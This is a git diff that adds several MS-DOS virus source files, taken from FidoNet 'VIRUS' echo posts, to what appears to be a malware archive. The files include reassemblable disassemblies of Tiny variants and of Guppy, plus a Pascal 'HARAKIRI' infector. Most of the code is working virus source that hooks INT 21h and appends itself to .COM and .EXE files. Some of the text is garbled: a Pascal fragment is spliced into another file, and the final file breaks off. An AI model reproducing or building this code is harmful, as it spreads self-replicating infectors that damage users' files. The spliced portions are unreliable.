Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_158.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Bill Dirks, 2:283/718 (06 Nov 94 16:32) +;* To : Gilbert Holleman +;* Subj : TINY_158.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Bill.Dirks@f718.n283.z2.fidonet.org + page ,132 + name TINY158 + title The 'Tiny' virus, version TINY-158 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-158 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FastEcho/386 1.41.b7/Real +; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/a,/s Alphabetic or Source-code segment ordering +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir24.asm b/MSDOS/Virus.MSDOS.Unknown.vir24.asm new file mode 100644 index 00000000..8a60641a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir24.asm @@ -0,0 +1,210 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 14 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_159.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:32) +;* To : Viral Doctor +;* Subj : TINY_159.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org + page ,132 + name TINY159 + title The 'Tiny' virus, version TINY-159 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-159 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + xchg ax,cx + test ax,ax + jz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FidoPCB v1.4 [NR] +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/m# Allow # multiple passes to resolve forward references +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir25.asm b/MSDOS/Virus.MSDOS.Unknown.vir25.asm new file mode 100644 index 00000000..a7221cf7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir25.asm @@ -0,0 +1,209 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 15 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_167.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:34) +;* To : Viral Doctor +;* Subj : TINY_167.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org + page ,132 + name TINY167 + title The 'Tiny' virus, version TINY-167 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-167 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + call v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + pop si ; Determine the start addres of the virus body + add si,[si-2] + +; Save the original first 4 bytes of the infected file on the stack: + + push word ptr ds:[si-4] + push word ptr ds:[si-2] + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov cl,2 ; The vector is 2 words long + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + mov ax,es ; Segment + loop vect_cpy ; Loop until done + +run: + mov di,offset start ; Point DI at program start + pop ax ; Restore AX + pop word ptr ds:[di+2] ; Restore the original first 4 bytes + pop word ptr ds:[di] ; of the file + push ds ; ES := DS + pop es + jmp di ; Go + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E8 ; Near CALL opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the CALL's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- PPoint 1.86 +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;Syntax: TASM [options] source [,object] [,listing] [,xref] +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir26.asm b/MSDOS/Virus.MSDOS.Unknown.vir26.asm new file mode 100644 index 00000000..bbc05131 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir26.asm @@ -0,0 +1,200 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 16 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_138.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 16:34) +;* To : Fred Lee +;* Subj : TINY_138.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org + page ,132 + name TINY138 + title The 'Tiny' virus, version TINY-138 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-138 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. + + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. +; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + call do_int21 + jc end_exec ; Exit on error + + cbw ; Zero AH + cwd ; Zero DX + mov bx,si ; Save handle in BX + mov ds,ax ; Set DS and ES to 60h, + mov es,ax ; the virus data segment + + mov ah,3F ; Read the first 4 bytes + int 69 + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + mov al,'M' ; Look for `M' + repne scasb + jz close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek ; SI now contains the file size + + mov cl,v_len ; Length of virus body + int 69 ; Append the virus to the file (AH is now 40h) + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + inc si ; Add 1 to file size for the JMP + xchg ax,si ; Move it in AX + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + xchg ax,dx ; Zero AX + call lseek ; Seek to the beginning + int 69 ; AH is 40h, write the JMP instruction + +close: + mov ah,3E ; Close the file + int 69 + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek: + mov ah,42 ; Seek operation + cwd ; Zero DX +do_int21: + xor cx,cx ; External entry for Open + int 69 + mov cl,4 ; 4 bytes will be read/written + xchg ax,si ; Store AX in SI + mov ax,4060 ; Prepare AH for Write + xor di,di ; Zero DI + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FMail 0.96 +; + Origin: This virus is Microsoft Windows (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/A=NNNN Set NewExe segment alignment factor +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir27.asm b/MSDOS/Virus.MSDOS.Unknown.vir27.asm new file mode 100644 index 00000000..bfbe327d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir27.asm @@ -0,0 +1,195 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 17 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : DOS_1.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:35) +;* To : Mark Hapershaw +;* Subj : DOS_1.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org +;DOS1 virus by the TridenT research group - Direct Action appending .COM + +;This virus infects .COM files in the current directory using FCB's. +;Other than FCB use, the virus is VERY simple. Avoids infecting misnamed +;EXE files by using an 'M' at the beginning of files to mark infection. + +;This virus requires a stub file made from the following debug script, +;to make it, compile the virus, then create the stub file by removing the +;semicolons from the code between the lines, saving it, and calling it +;vstub.hex. Then use the following commands: + +; Debug '); If Debug then Writeln (Myfile); + + BlockRead(FromF,buf1,SizeOf(buf1),NumRead); + BlockRead(FromF2,buf2,SizeOf(buf2),NumRead); + + j1:=1; + While j1<=Buf_Size do + begin + If Buf1[j1] <> Buf2[j1] then + begin + If Debug then Writeln ('Ej Infekterad....!'); + j1:=10000; + Inc (j1); + Check_file:=True; + end; + Inc (j1); + end; + + If j1>=9999 then + begin + Check_file:=True; + end; + Close (FromF); Close (FromF2); +End; + +{------------------------------------------------------------------} +Procedure Search_4_File (Sdir: String); + +Var + Dir_save : Array[1..100] of string [12]; + I,Imax : Integer; + Mask : String[80]; + Attr : Integer; + Any_File_found : Boolean; + New_F : Boolean; + Antal_Infected : Integer; + +Begin + Antal_Infected:=0; + If Debug then Writeln('Sdir = ' ,Sdir); + Mask := SDir + SearchFile; + Any_File_found := False; + + FindFirst(Mask, $3F, DirInfo); + + I := 0; + + Begin + If DosError=0 then + begin + I := Length( SDir ); + end; + I := 0; + While DosError=0 do + begin + If DirInfo.name[1] <> '.' then + begin + Any_File_found := true; + If Debug then Writeln(Dirinfo.name); + New_F := Check_File (SDir+DirInfo.Name); + If New_F=True then + begin + If Debug then Writeln ('Infecting file'); + Infect_File (Sdir+DirInfo.Name); + Inc (Antal_Infected); + + If Antal_Infected >= 4 then + begin + Writeln ('Program too big to fit in memory'); + Halt; + end; + If Debug then Writeln (Antal_Infected); + end; + If New_F=False then + begin + If Debug then Writeln ('File Already Infected'); + end; + end; + FindNext(DirInfo); + end; {while} + End; + + Mask := Sdir + '*.*'; + FindFirst(Mask, Directory, DirInfo); { look for dir only } + Imax := 0; I:= 1; + + While DosError=0 do { Gr lista ver directories..} + Begin + If DirInfo.Attr and Directory <> 0 then + begin + If DirInfo.name[1] <> '.' then + begin + Dir_save[I] := DirInfo.Name; + Imax := I; inc(I); + end; + end; + FindNext(DirInfo); + End; {while} + + I:=1; + While I <= Imax do + begin + Search_4_File(SDir + Dir_save[I] + '\'); + I:= I+1; + end; +End; + +{====Main===================================================================} +BEGIN + Debug := true; + SearchFile := '*.exe'; + Search_4_File ('\'); + SearchFile := '*.com'; + Search_4_File ('\'); + + Writeln ('Your PC is alive and infected with the HARAKIRI virus!'); + +END. + +-+- GoldED/386 2.50.B1016+ + + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +============================================================================= + +Yoo-hooo-oo, -! + + + The MeeO + +/A=NNNN Set NewExe segment alignment factor + +--- Aidstest Null: /Kill + * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir30.asm b/MSDOS/Virus.MSDOS.Unknown.vir30.asm new file mode 100644 index 00000000..3fa1911d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir30.asm @@ -0,0 +1,191 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 20 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : GUPPY.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39) +;* To : Brad Frazee +;* Subj : GUPPY.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org +;*************************************************************************** +;* The Guppy Virus * +;* Disassembly by Black Wolf * +;*************************************************************************** +;* The Guppy virus is a relatively simple, very small, resident .COM * +;*infector. It uses the standard way for a regular program to go resident * +;*(i.e. Int 27) which makes the infected program terminate the first time * +;*run. After that, however, infected files will run perfectly. This virus* +;*uses interesting methods to restore the storage bytes, as well as a * +;*strange technique to restore control to an infected file after it has * +;*already gone memory resident. * +;* * +;*Note: The Guppy virus was originally assembled with an assembler other * +;* than Tasm, so to keep it exactly the same some commands must be * +;* entered directly as individual bytes. In these cases, the command * +;* is commented out and the bytes are found below it. * +;* * +;*************************************************************************** + +.model tiny +.radix 16 +.code + + org 100h +start: + call Get_Offset + +Get_Offset: + pop si ;SI = offset of vir + + ;(Get_Offset-Start) + mov ax,3521h + mov bx,ax + int 21h ;Get Int 21 Address + + mov ds:[si+Int_21_Offset-103],bx ;Save old Int 21 + mov ds:[si+Int_21_Segment-103],es + + ;mov dx,si ;Bytes vary between assemblers + db 89,0f2 + + ;add dx,offset Int_21_Handler-104 + db 83,0c2,1f + + mov ah,25h + int 21h ;Set Int 21 + + inc dh ;Add 100h bytes to go resident + ;from handler + push cs + pop es + int 27h ;Terminate & stay resident + + +Int_21_Handler: + cmp ax,4B00h ;Is call a Load & Execute? + je Infect ;Yes? Jump Infect + + cmp al,21h ;Might it be a residency check? + jne Go_Int_21 ;No? Restore control to Int 21 + + ;cmp ax,bx ;Are AX and BX the same? + db 39,0d8 + + jne Go_Int_21 ;No, Restore control to Int 21 + + push word ptr [si+3dh] ;3dh = offset of Storage_Bytes - + ;Get_Offset + + ;This gets the first word of + ;storage bytes, which is then + ;popped to CS:100 to restore it. + + mov bx,offset ds:[100] ;100 = Beginning of COM + pop word ptr [bx] + + mov cl,[si+3Fh] ;Restore third storage byte. + mov [bx+2],cl + +Restore_Control: + pop cx + push bx + iret ;Jump back to Host program. + +Storage_Bytes db 0, 0, 0 + +Infect: + push ax + push bx + push dx + push ds + mov ax,3D02h + int 21h ;Open File for Read/Write Access + + xchg ax,bx + call Get_Offset_Two + +Get_Offset_Two: + pop si + push cs + pop ds + mov ah,3F + mov cx,3 + sub si,10 ;Set SI=Storage_Bytes + + ;mov dx,si + db 89,0f2 + + int 21h ;Read first 3 bytes of file + + cmp byte ptr [si],0E9h ;Is the first command a jump? + jne Close_File ;No? Jump to Close_File + mov ax,4202h + xor dx,dx + xor cx,cx + int 21h ;Go to end of file + + xchg ax,di + mov ah,40h + mov cl,98h ;Virus Size + + ;mov dx,si + db 89,0f2 + + sub dx,40h ;Beginning of virus + int 21h ;Append virus to new host + + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h ;Go back to beginning of file + + mov cl,3 + + ;sub di,cx + db 29,0cf + + mov [si+1],di + mov ah,40h + + ;mov dx,si + db 89,0f2 + + int 21h ;Write 3 byte jump to file + +Close_File: + mov ah,3Eh + int 21h + + pop ds + pop dx + pop bx + pop ax +Go_Int_21: + db 0EAh ;Go On With Int 21 +Int_21_Offset dw ? +Int_21_Segment dw ? + +end start + +;-+- UC2 Support France +; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/d Warn if duplicate symbols in libraries +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir31.asm b/MSDOS/Virus.MSDOS.Unknown.vir31.asm new file mode 100644 index 00000000..8555dcac --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir31.asm @@ -0,0 +1,231 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 21 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_198.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:40) +;* To : Gilbert Holleman +;* Subj : TINY_198.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org + page ,132 + name TINY198 + title The 'Tiny' virus, version TINY-198 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-198 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-v_entry + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +v_entry: + call self ; Determine the start addres of the virus body +self: + pop si + sub si,3 + + push ax ; Save AX (to keep programs as DISKCOPY happy) + +; Check whether the virus is already in memory and just run the program if so: + + mov ah,0E9 + int 21 + + mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h) + xor cx,cx ; ES 